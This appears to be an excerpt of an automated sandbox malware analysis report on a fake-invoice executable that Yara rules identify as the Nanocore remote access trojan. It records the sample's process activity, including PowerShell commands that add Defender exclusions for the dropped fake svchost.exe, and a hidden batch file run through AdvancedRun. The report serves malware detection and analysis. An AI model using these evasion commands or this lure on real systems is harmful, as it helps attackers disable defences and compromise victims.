        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
        Source: svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
        Source: svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
        Source: svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
        Source: svchost.exe, 00000012.00000003.310574824.000001F77325D000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
        Source: svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
        Source: svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
        Source: svchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
        Source: svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
        Source: svchost.exe, 00000012.00000003.288221774.000001F773232000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drString found in binary or memory: https://sectigo.com/CPS0C
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drString found in binary or memory: https://sectigo.com/CPS0D
        Source: svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
        Source: svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.312067468.000001F773213000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
        Source: svchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
        Source: svchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
        Source: svchost.exe, 00000012.00000003.310709236.000001F773240000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
        Source: svchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
        Source: svchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORY
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Executable has a suspicious name (potential lure to open the executable)Show sources
        Source: CN-Invoice-XXXXX9808-19011143287990.exeStatic file information: Suspicious name
        Initial sample is a PE file and has a suspicious nameShow sources
        Source: initial sampleStatic PE information: Filename: CN-Invoice-XXXXX9808-19011143287990.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_08396890 NtSetInformationThread,0_2_08396890
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_0839F13B NtSetInformationThread,0_2_0839F13B
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_0839F198 NtSetInformationThread,0_2_0839F198
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_008BCF8C0_2_008BCF8C
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_008BCF800_2_008BCF80
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_008BF0300_2_008BF030
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_008BD3600_2_008BD360
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_008BB71C0_2_008BB71C
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_083700400_2_08370040
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_08398EB00_2_08398EB0
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_083700160_2_08370016
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_08398EA10_2_08398EA1
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604
        Source: CN-Invoice-XXXXX9808-19011143287990.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: svchost.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534877445.0000000008320000.00000002.00000001.sdmpBinary or memory string: originalfilename vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534877445.0000000008320000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534487700.0000000008080000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000000.221983662.000000000008A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWgjnHXED.exe2 vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDXGI QpV.exe2 vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.527751547.0000000005B50000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exeBinary or memory string: OriginalFilenameWgjnHXED.exe2 vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
        Source: CN-Invoice-XXXXX9808-19011143287990.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: classification engineClassification label: mal100.troj.evad.winEXE@56/29@6/5
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,8_2_00408FC9
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 9_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,9_2_00408FC9
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,8_2_004095FD
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,8_2_0040A33B
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,8_2_00401306
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5604
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{eccd15db-272a-41be-b8cd-5f3fef4189ce}
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_01
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4Jump to behavior
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: CN-Invoice-XXXXX9808-19011143287990.exeReversingLabs: Detection: 25%
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile read: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /SpecialRun 4101d8 5380
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force
        Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
        Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        Source: unknownProcess created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
        Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604
        Source: unknownProcess created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 2060
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
